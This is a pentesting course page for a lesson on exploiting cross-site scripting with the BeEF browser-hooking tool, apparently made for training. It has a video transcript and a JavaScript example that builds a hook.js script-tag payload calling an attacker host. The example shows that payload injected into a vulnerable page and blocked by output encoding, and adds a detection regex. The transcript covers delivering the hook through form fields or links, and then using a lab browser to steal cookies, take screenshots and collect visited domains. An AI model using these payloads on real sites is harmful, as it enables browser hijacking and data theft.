Time
4 hours 20 minutes
Difficulty
Intermediate
CEU/CPE
5

Video Description

This lesson covers exploiting XSS using the BeEF (Browser Exploitation Framework) tool. Hooking a browser with BeEF is a multi-step process: craft the hook payload, deliver it to the victim through an XSS flaw (a stored form field or a crafted link), and then control the victim's browser from the BeEF console.
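As an added example that is not part of the lesson or of BeEF itself, the snippet below shows the delivery step in code: a page that reflects a parameter unencoded will serve the BeEF hook tag to anyone who views it, while the same page with HTML output encoding shows the payload as harmless text. It also includes a simple defender-side check for hook.js script tags of the kind the lesson tests an IDS/IPS against. The attacker address (192.168.0.10:3000) and hook.js follow the lab in the video; the "name" parameter and page layout are illustrative assumptions.

```javascript
// Added example (not part of the lesson or of BeEF itself): how the BeEF hook
// is delivered through an XSS flaw, and why output encoding stops it.
// The attacker address follows the lab in the video (192.168.0.10:3000 and
// hook.js); the "name" parameter and page layout are illustrative assumptions.

const ATTACKER_HOST = "192.168.0.10:3000";
const HOOK_PAYLOAD = `<script src="http://${ATTACKER_HOST}/hook.js"></script>`;

// Vulnerable page: the untrusted parameter is concatenated straight into HTML,
// so a hook.js <script> tag submitted as "name" is served back to every viewer.
function renderVulnerable(name) {
  return `<html><body><h1>Hello ${name}</h1></body></html>`;
}

// HTML-encode the characters that can break out of a text node or attribute.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Hardened page: same template, but the parameter is encoded before insertion,
// so the payload is displayed as text instead of being executed.
function renderHardened(name) {
  return `<html><body><h1>Hello ${escapeHtml(name)}</h1></body></html>`;
}

// Defender-side check (e.g. over a proxy capture or a stored-XSS scan of your
// own pages): does the HTML load a script from a BeEF-style hook URL?
// Matches <script ... src="http(s)://<anything>/hook.js"> with either quote style.
const HOOK_RE = /<script[^>]*\bsrc\s*=\s*["']?https?:\/\/[^"'\s>]+\/hook\.js\b/i;
function containsHookScript(html) {
  return HOOK_RE.test(html);
}

// Constructed sample pages: the same payload hitting the vulnerable handler
// and the hardened handler, plus a benign request for comparison.
function scanSamples() {
  const samples = {
    vulnerable: renderVulnerable(HOOK_PAYLOAD),
    hardened: renderHardened(HOOK_PAYLOAD),
    benign: renderVulnerable("alice"),
  };
  const result = {};
  for (const [label, html] of Object.entries(samples)) {
    result[label] = containsHookScript(html);
  }
  return result;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(scanSamples()); // { vulnerable: true, hardened: false, benign: false }
}
```

Run it with `node` to see the three verdicts. The detection regex is deliberately loose on host and quoting because an attacker controls both; the only stable part of a default BeEF hook is the `hook.js` filename, so a serious detection would also watch for outbound connections to port 3000 and the polling traffic a hooked browser generates.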

Video Transcription

00:04
Next, we're gonna use a tool called BeEF.
00:06
BeEF is a tool which allows you to gain control over somebody's
00:11
browser.
00:13
It's very dangerous,
00:15
but there's a couple of steps we have to do
00:18
in order to
00:20
exploit
00:21
the vulnerability.
00:23
So first we'll need to build the malicious code.
00:26
Next, we have to make the URL, then finally send that URL to a victim, and the fourth step: profit.
00:34
So first, we're gonna start the BeEF application
00:38
from the Applications > Exploitation Tools menu.
00:41
Then after that, we're gonna browse to 127.0.0.1 with port
00:47
3000
00:49
/ui/authentication, and the username and password will be beef. So you could do that.
01:00
So go to Applications,
01:04
Exploitation Tools,
01:08
and BeEF XSS Framework.
01:11
Now, let's go over to our, uh, we've got our
01:15
browser here.
01:25
Type ui/authentication and we have our BeEF page.
01:30
So username of beef,
01:33
password of beef,
01:38
and we're now in.
01:40
Now our hook
01:42
is
01:44
here's an example of what the hook would be.
01:48
Now,
01:49
if you were attacking somebody, you would put your IP address in here,
01:53
the port 3000, hook.js, and you would send it to them.
01:59
Next, the malicious code will need to be crafted. The way I do that is: script source equals attacker IP,
02:05
port 3000, hook.js. This line can be found when you initially start BeEF up.
02:10
So you start it up, you get the hook example. So the hook
02:15
will then need to be delivered.
02:17
This would be done by placing it in a form field like we did with our prior example. Or it could be delivered
02:23
via a link. So you can either place it in a form field, and as users go to that web page they just keep getting hit one by one and just keep
02:35
becoming bots to BeEF, which is very dangerous.
02:38
However, if you just want to do a one-off, you just send it to one person, boom, they get hit. It's an excellent tool
02:46
to test just how far somebody can interact with your network. So if you think, oh, my intrusion prevention system or my intrusion detection system will stop somebody from being able to do this, test it out. See if somebody on the outside
03:02
can communicate with and control somebody's web browser from the inside of your network.
03:07
And then after we deliver the code, we're gonna wait for the victim to browse the site. And then once they do, you'll get a confirmation, as we've shown here
03:15
in the browsers. So let's go
03:17
put that
03:19
malicious link
03:21
into the web page, browse to it, and see if we become a hooked browser. All right, here we are on the BeEF control panel. We can see that if there were any online browsers, they would show up here.
03:32
These are all the offline browsers. So
03:37
if you did have, ah,
03:39
a computer hooked at one time, that information will stay here for you
03:46
to be able to
03:49
communicate with, or attempt to communicate with, another time. All right, so let's come back over to PentesterLab
03:55
and we're gonna put it in our script here.
04:00
My IP address will be our local IP address of 192.168
04:05
.0.10.
04:08
Let's submit this query. Let's actually keep this and see what happens
04:13
when we get the popup from before.
04:15
And I'm sure some of this information is being sent over now.
04:18
Oh, look at that. We have a hooked browser.
04:30
With this hooked browser, we can see all kinds of different information about it,
04:33
including the cookie, host, IP address.
04:39
So we know it's coming from,
04:41
what website it's coming from, the PentesterLab website, and the IP, just the website it's coming from, all kinds of nifty information.
04:48
So it's very, very awesome information you can get from this.
04:54
Now we have all these different awesome pieces of information about this
05:00
person
05:00
who has, ah,
05:02
executed
05:03
this exploit. So
05:05
one thing we can do is, if we go over here to Logs, you see different events that have happened.
05:12
We also can come over here to Commands.
05:14
Now commands are a pretty awesome tool
05:18
because the commands let us do all kinds of different things. For example, if we have a webcam hooked up to the browser,
05:27
we can actually take a picture through the individual's webcam. We're using a VM environment, so you will have to actually go into your
05:34
virtual environment system settings up at the top
05:42
and add a USB device if you want to be able to take a picture through your VM.
05:49
However, we're not gonna bother with all of that right now. So we do stuff on here
05:55
that is, ah, it's pretty awesome. So we could play a sound over on their
06:00
browser, or we can do more malicious things.
06:13
Things like attempting a browser exploitation automatically
06:17
or running a bunch of different
06:20
cross-site scripting
06:23
exploits
06:25
against the individual.
06:27
If it's green,
06:28
it means that that
06:30
person is vulnerable to it. If it's orange, you might be able to get it. If it's red, you're
06:35
probably not gonna get it.
06:47
You could also do this to get network information as well. You could do ping sweeps internally on something. So if you want to get further information on somebody's network, you could have them
07:00
go to this page
07:01
or go to a link that you have this exploit set up at. Then you can get further information about the person's
07:10
internal network.
07:15
There are also social engineering tools in here as well, if you want to try to use
07:18
social engineering tools against individuals
07:24
in your network who you may be auditing.
07:29
So how do you use one of these tools? Well,
07:31
let's detect extensions.
07:35
So you click on the item
07:39
and then you click Execute. Now it checks for Google Chrome, Mozilla Firefox. So we're not gonna get anything back, really, for this one. But we see the command executed here.
07:48
And if you click on it, you'll get the command results.
07:53
So let's, uh, let's try to get
07:56
URLs that we've gone to.
07:59
So Get Visited URLs,
08:01
Execute, come up here,
08:05
and it's not an Avant browser, so it did not work. But we can attempt Get Visited Domains. Let's execute that.
08:13
Let me hit Execute.
08:24
We see PentesterLab freaking out up here because
08:28
our current
08:30
program, the BeEF
08:31
application here, is
08:35
trying to
08:37
basically go back and go over all of the different things that we've gone to. Look at that.
08:43
We've got a whole bunch of different domains, um,
08:50
many of which are false results.
09:01
Wow, really?
09:03
It's just, it's getting us onto that one.
09:13
So let's execute one of these. So we're gonna come over here, we're gonna click Spyder Eye.
09:20
We're gonna execute this. It takes a picture of the victim's browser.
09:22
Come over here to command 1, then we're gonna see the results.
09:28
It may take a second for the results to show up.
09:31
So after you click something, do not necessarily just give up real quick, because it will take a moment. If it doesn't work the first time,
09:39
which it may not,
09:43
re-execute it a couple of times until you see results.
09:50
There we go.
09:52
Fourth attempt. We have
09:54
a picture of the browser. So this is
09:58
an excellent option to be able to steal
10:01
things that the person might have typed or might have up on their browser at that time, which is
10:07
pretty dangerous.
10:54
You can also attempt to steal any autocompletes as well, so we can click Execute on here, and we're gonna try to steal any autocomplete
11:03
that may have been, ah,
11:07
in that browser.
11:07
Probably, if I have, uh,
11:11
put any autocompletes in. So it's dropped down here.
11:16
Uh, do name.
11:16
We'll execute that one.
11:24
Um,
11:28
do username or email,
11:33
email.
11:35
So let's see if we get anything back. Command results: got nothing for that one. Nothing.
12:11
Another cool thing about this is you can use it to test and find different
12:16
types of add-ons that may be on the browser as well. So I know I have Firebug.
12:22
Let's do a detect here and see if it can find Firebug.
12:26
So it executes from over here, command 2. And look at that.
12:31
Firebug is enabled and in use.
12:35
So lots of things you can do with this.
12:37
Definitely
12:39
see how far you can get with this tool.
12:41
Keep poking around and, uh, try it out, because it's awesome, all the different things you can do.
12:52
We also have the server itself here hooked.
12:56
So you can also do commands against the server
13:01
itself and try to get information
13:03
from that web server even further.
13:05
So, yeah,
13:07
try it out. It's awesome.
13:09
So we've covered, well, we covered how to exploit cross-site scripting manually
13:13
using redirection and cookie theft. And then we also covered how to exploit cross-site scripting with BeEF. Happy hacking, everyone.

Up Next

Web Application Penetration Testing

In this web application penetration testing course, SME, Raymond Evans, takes you on a wild and fascinating journey into the cyber security discipline of web application pentesting. This is a very hands-on course that will require you to set up your own pentesting environment.

Instructed By

Raymond Evans
Instructor